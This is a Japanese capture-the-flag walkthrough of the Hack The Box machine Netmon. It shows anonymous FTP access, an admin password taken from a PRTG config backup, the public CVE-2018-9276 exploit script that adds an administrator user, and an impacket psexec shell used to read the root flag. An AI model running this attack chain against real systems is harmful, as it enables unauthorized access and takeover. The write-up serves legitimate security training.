FTPが公開されている

nmap -A -n -F -T5 netmon.htb
Starting Nmap 7.80 ( https://nmap.org ) at 2020-08-15 15:31 UTC
Nmap scan report for netmon.htb (10.10.10.152)
Host is up (0.045s latency).
Not shown: 95 filtered ports
PORT    STATE SERVICE      VERSION
21/tcp  open  ftp          Microsoft ftpd
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
| 02-03-19  12:18AM                 1024 .rnd
| 02-25-19  10:15PM       <DIR>          inetpub
| 07-16-16  09:18AM       <DIR>          PerfLogs
| 02-25-19  10:56PM       <DIR>          Program Files
| 02-03-19  12:28AM       <DIR>          Program Files (x86)
| 02-03-19  08:08AM       <DIR>          Users
|_02-25-19  11:49PM       <DIR>          Windows
| ftp-syst:
|_  SYST: Windows_NT
80/tcp  open  http         Indy httpd 18.1.37.13946 (Paessler PRTG bandwidth monitor)
|_http-server-header: PRTG/18.1.37.13946
|_http-title: PRTG Starting...
|_http-trane-info: Problem with XML parsing of /evox/about
135/tcp open  msrpc        Microsoft Windows RPC
139/tcp open  netbios-ssn  Microsoft Windows netbios-ssn
445/tcp open  microsoft-ds Microsoft Windows Server 2008 R2 - 2012 microsoft-ds
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: printer|switch
Running (JUST GUESSING): HP embedded (85%), Dell embedded (85%)
OS CPE: cpe:/h:hp:designjet_650c cpe:/h:dell:powerconnect_5424
Aggressive OS guesses: HP DesignJet 650C printer (85%), Dell PowerConnect 5424 switch (85%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: OSs: Windows, Windows Server 2008 R2 - 2012; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: mean: 5m31s, deviation: 0s, median: 5m30s
|_smb-os-discovery: ERROR: Script execution failed (use -d to debug)
| smb-security-mode:
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
| smb2-security-mode:
|   2.02:
|_    Message signing enabled but not required
| smb2-time:
|   date: 2020-08-15T15:37:45
|_  start_date: 2020-08-15T15:36:49

FTP接続してuser.txtを取得する

# ftp netmon.htb
Connected to netmon.htb.
220 Microsoft FTP Service
Name (netmon.htb:root): anonymous
331 Anonymous access allowed, send identity (e-mail name) as password.
Password:
230 User logged in.
Remote system type is Windows_NT.

ftp> passive
Passive mode on.

ftp> ls
227 Entering Passive Mode (10,10,10,152,207,23).
150 Opening ASCII mode data connection.
02-03-19  12:18AM                 1024 .rnd
02-25-19  10:15PM       <DIR>          inetpub
07-16-16  09:18AM       <DIR>          PerfLogs
02-25-19  10:56PM       <DIR>          Program Files
02-03-19  12:28AM       <DIR>          Program Files (x86)
02-03-19  08:08AM       <DIR>          Users
02-25-19  11:49PM       <DIR>          Windows
226 Transfer complete.

ftp> cd Users\Public
250 CWD command successful.

ftp> dir
227 Entering Passive Mode (10,10,10,152,207,27).
125 Data connection already open; Transfer starting.
02-03-19  08:05AM       <DIR>          Documents
07-16-16  09:18AM       <DIR>          Downloads
07-16-16  09:18AM       <DIR>          Music
07-16-16  09:18AM       <DIR>          Pictures
02-03-19  12:35AM                   33 user.txt
07-16-16  09:18AM       <DIR>          Videos
226 Transfer complete.

ftp> mget user.txt
mget user.txt? y
227 Entering Passive Mode (10,10,10,152,207,29).
125 Data connection already open; Transfer starting.
WARNING! 1 bare linefeeds received in ASCII mode
File may not have transferred correctly.
226 Transfer complete.
33 bytes received in 0.20 secs (0.1649 kB/s)

80番ポートにアクセスしてみる

PRTG Network Monitor (NETMON) なるものが動作している。

データファイルにFTPでアクセスすると、configファイルのバックアップを取得できる。

ftp> cd "Users\All Users\Paessler\PRTG Network Monitor\"
250 CWD command successful.

ftp> ls
227 Entering Passive Mode (10,10,10,152,207,212).
125 Data connection already open; Transfer starting.
08-15-20  12:18PM       <DIR>          Configuration Auto-Backups
08-15-20  11:37AM       <DIR>          Log Database
02-03-19  12:18AM       <DIR>          Logs (Debug)
02-03-19  12:18AM       <DIR>          Logs (Sensors)
02-03-19  12:18AM       <DIR>          Logs (System)
08-15-20  11:37AM       <DIR>          Logs (Web Server)
08-15-20  11:42AM       <DIR>          Monitoring Database
02-25-19  10:54PM              1189697 PRTG Configuration.dat
02-25-19  10:54PM              1189697 PRTG Configuration.old
07-14-18  03:13AM              1153755 PRTG Configuration.old.bak
08-15-20  01:42PM              1713485 PRTG Graph Data Cache.dat
02-25-19  11:00PM       <DIR>          Report PDFs
02-03-19  12:18AM       <DIR>          System Information Database
02-03-19  12:40AM       <DIR>          Ticket Database
02-03-19  12:18AM       <DIR>          ToDo Database
226 Transfer complete.

ftp> mget "PRTG Configuration.old.bak"
mget PRTG Configuration.old.bak? y
227 Entering Passive Mode (10,10,10,152,207,228).
125 Data connection already open; Transfer starting.
226 Transfer complete.
1153755 bytes received in 3.23 secs (348.8171 kB/s)

バックアップファイルの認証情報でログインする

先ほど取得したバックアップファイルを確認すると PrTg@dmin2018 が取得できる。

# cat PRTG\ Configuration.old.bak | grep -A 1 prtgadmin
              <!-- User: prtgadmin -->
              PrTg@dmin2018

これではログインできず、日付からパスワードが PrTg@dmin2019 であることを推測してログインする。

探してみたがadministratorの手掛かりは見つからない。

PRTG Network Monitor (NETMON) の脆弱性を探す

# searchsploit prtg
------------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
 Exploit Title                                                                                                                                         |  Path
------------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
PRTG Network Monitor 18.2.38 - (Authenticated) Remote Code Execution                                                                                   | windows/webapps/46527.sh
PRTG Network Monitor < 18.1.39.1648 - Stack Overflow (Denial of Service)                                                                               | windows_x86/dos/44500.py
PRTG Traffic Grapher 6.2.1 - 'url' Cross-Site Scripting                                                                                                | java/webapps/34108.txt
------------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results

# searchsploit -m windows/webapps/46527.sh
  Exploit: PRTG Network Monitor 18.2.38 - (Authenticated) Remote Code Execution
      URL: https://www.exploit-db.com/exploits/46527
     Path: /usr/share/exploitdb/exploits/windows/webapps/46527.sh
File Type: Bourne-Again shell script, ASCII text executable, with very long lines, with CRLF line terminators

Copied to: /home/shimizu/netmon/46527.sh

# ./46527.sh -u http://10.10.10.152 -c "_ga=GA1.2.1241551964.1597505933; _gid=GA1.2.1239716465.1597505933; OCTOPUS1813713946=e0RERDI4MEQ2LUFCNTYtNEVENi1CRjJBLUU5RjcxNUI4MzE1Nn0%3D; _gat=1"
bash: ./46527.sh: /bin/bash^M: bad interpreter: No such file or directory

# sed -i 's/\r//' 46527.sh

# ./46527.sh -u http://10.10.10.152 -c "_ga=GA1.2.1241551964.1597505933; _gid=GA1.2.1239716465.1597505933; OCTOPUS1813713946=e0RERDI4MEQ2LUFCNTYtNEVENi1CRjJBLUU5RjcxNUI4MzE1Nn0%3D; _gat=1"

[+]#########################################################################[+]
[*] Authenticated PRTG network Monitor remote code execution                [*]
[+]#########################################################################[+]
[*] Date: 11/03/2019                                                        [*]
[+]#########################################################################[+]
[*] Author: https://github.com/M4LV0   lorn3m4lvo@protonmail.com            [*]
[+]#########################################################################[+]
[*] Vendor Homepage: https://www.paessler.com/prtg                          [*]
[*] Version: 18.2.38                                                        [*]
[*] CVE: CVE-2018-9276                                                      [*]
[*] Reference: https://www.codewatch.org/blog/?p=453                        [*]
[+]#########################################################################[+]

# login to the app, default creds are prtgadmin/prtgadmin. once athenticated grab your cookie and use it with the script.
# run the script to create a new user 'pentest' in the administrators group with password 'P3nT3st!'

[+]#########################################################################[+]

 [*] file created
 [*] sending notification wait....

 [*] adding a new user 'pentest' with password 'P3nT3st'
 [*] sending notification wait....

 [*] adding a user pentest to the administrators group
 [*] sending notification wait....


 [*] exploit completed new user 'pentest' with password 'P3nT3st!' created have fun!

Cookieは先ほどログインしたブラウザ情報から入手した。

pentestユーザでroot.txtを取得する

# cd /usr/share/doc/python3-impacket/examples
# python3 psexec.py pentest:'P3nT3st!'@10.10.10.152
Impacket v0.9.21 - Copyright 2020 SecureAuth Corporation

[*] Requesting shares on 10.10.10.152.....
[*] Found writable share ADMIN$
[*] Uploading file CTXMidGW.exe
[*] Opening SVCManager on 10.10.10.152.....
[*] Creating service Gvmj on 10.10.10.152.....
[*] Starting service Gvmj.....
[!] Press help for extra shell commands
Microsoft Windows [Version 10.0.14393]
(c) 2016 Microsoft Corporation. All rights reserved.

C:\Windows\system32>type C:\Users\Administrator\Desktop\root.txt
3018977fb944bf1878f75b879fba67cc